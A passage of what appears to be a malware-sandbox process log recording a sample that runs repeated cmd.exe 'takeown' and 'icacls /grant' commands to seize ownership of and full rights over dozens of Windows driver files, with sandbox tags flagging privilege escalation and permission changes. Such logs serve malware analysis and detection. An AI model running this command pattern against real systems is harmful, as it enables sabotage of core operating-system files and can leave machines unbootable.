C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\disk.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"3⤵PID:3560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit2⤵PID:3636
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Diskdump.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit2⤵PID:3736
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dmvsc.sys3⤵PID:3800
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"3⤵PID:3848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit2⤵PID:3676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmk.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"3⤵PID:3816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit2⤵PID:3728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmkaud.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"3⤵PID:3940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit2⤵PID:3820
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Dumpata.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"3⤵PID:4000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit2⤵PID:3836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dumpfve.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"3⤵PID:1324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit2⤵PID:3840
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxapi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxapi.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit2⤵PID:3996
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxg.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxg.sys /grant "Admin:F"3⤵PID:3204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit2⤵PID:3952
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgkrnl.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit2⤵PID:3964
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgmms1.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"3⤵PID:3392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit2⤵PID:3212
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\elxstor.sys3⤵PID:3200
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"3⤵PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit2⤵PID:3304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\errdev.sys3⤵PID:3316
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"3⤵PID:3272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit2⤵PID:3328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\evbda.sys3⤵PID:3180
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit2⤵PID:3376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\exfat.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"3⤵PID:3660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit2⤵PID:3396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fastfat.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit2⤵PID:2440
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fdc.sys3⤵PID:3708
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"3⤵PID:3596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit2⤵PID:3152
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fileinfo.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3656
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"3⤵PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit2⤵PID:3352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\filetrace.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"3⤵PID:3776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit2⤵PID:3416
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\flpydisk.sys3⤵
- Modifies file permissions
PID:3740
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"3⤵PID:3564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit2⤵PID:3524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fltMgr.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit2⤵PID:3828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fsdepends.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"3⤵PID:3472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit2⤵PID:3848
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fs_rec.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"3⤵PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit2⤵PID:3972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fvevol.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit2⤵PID:3792
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit2⤵PID:2304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\GAGP30KX.SYS3⤵PID:2472
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "Admin:F"3⤵PID:3196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit2⤵PID:3144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gm.dls3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"3⤵PID:3456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit2⤵PID:3960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gmreadme.txt3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"3⤵PID:3316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit2⤵PID:3380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hcw85cir.sys3⤵PID:3648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"3⤵PID:3708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit2⤵PID:3156
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hdaudbus.sys3⤵PID:3388
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"3⤵PID:3904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit2⤵PID:3480
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HdAudio.sys3⤵
- Modifies file permissions
PID:3664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"3⤵PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit2⤵PID:3384
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbatt.sys3⤵PID:3596
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit2⤵PID:3556
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbth.sys3⤵PID:3652
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"3⤵PID:3724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit2⤵PID:3700
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidclass.sys3⤵PID:3776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit2⤵PID:3372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidir.sys3⤵PID:2168
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"3⤵PID:3272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit2⤵PID:3332
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidparse.sys3⤵PID:3456
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"3⤵PID:3620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit2⤵PID:3696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidusb.sys3⤵
- Possible privilege escalation attempt
PID:2472
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"3⤵PID:3312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit2⤵PID:3740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HpSAMD.sys3⤵PID:4052
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"3⤵PID:3128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit2⤵PID:3420
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\http.sys3⤵PID:3732
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"3⤵PID:3364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit2⤵PID:3940
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hwpolicy.sys3⤵PID:3440
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"3⤵PID:3540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit2⤵PID:3984
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\i8042prt.sys3⤵
- Modifies file permissions
PID:3196
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"3⤵PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit2⤵PID:3632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaStorV.sys3⤵PID:4024
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"3⤵PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit2⤵PID:3572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iirsp.sys3⤵PID:4048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iirsp.sys /grant "Admin:F"3⤵PID:3536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit2⤵PID:2180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelide.sys3⤵PID:3388
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit2⤵PID:3588
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelppm.sys3⤵PID:3756
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit2⤵PID:3428
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipfltdrv.sys3⤵PID:3884
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"3⤵PID:3628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit2⤵PID:3904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\IPMIDrv.sys3⤵PID:3764
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"3⤵PID:3504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit2⤵PID:3292
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipnat.sys3⤵PID:3508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"3⤵PID:3440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit2⤵PID:3392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irda.sys3⤵PID:3196
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irda.sys /grant "Admin:F"3⤵PID:3536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit2⤵PID:3856
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irenum.sys3⤵PID:4088
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irenum.sys /grant "Admin:F"3⤵PID:3388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit2⤵PID:4012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\isapnp.sys3⤵PID:4032
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"3⤵PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit2⤵PID:4084
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdclass.sys3⤵PID:3244
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit2⤵PID:3312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdhid.sys3⤵PID:2664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"3⤵PID:3704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit2⤵PID:3680
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ks.sys3⤵PID:3720
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"3⤵PID:3316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit2⤵PID:3468
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecdd.sys3⤵PID:2416
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit2⤵PID:3872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecpkg.sys3⤵
- Modifies file permissions
PID:3604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit2⤵PID:4000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksthunk.sys3⤵PID:3528
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"3⤵PID:3708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit2⤵PID:3276
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lltdio.sys3⤵
- Possible privilege escalation attempt
PID:2928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"3⤵PID:3272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit2⤵PID:3988
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_fc.sys3⤵PID:3192
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"3⤵PID:3540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit2⤵PID:3812
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas.sys3⤵
- Modifies file permissions
PID:3852
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"3⤵PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit2⤵PID:3104
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas2.sys3⤵PID:3628
-
-
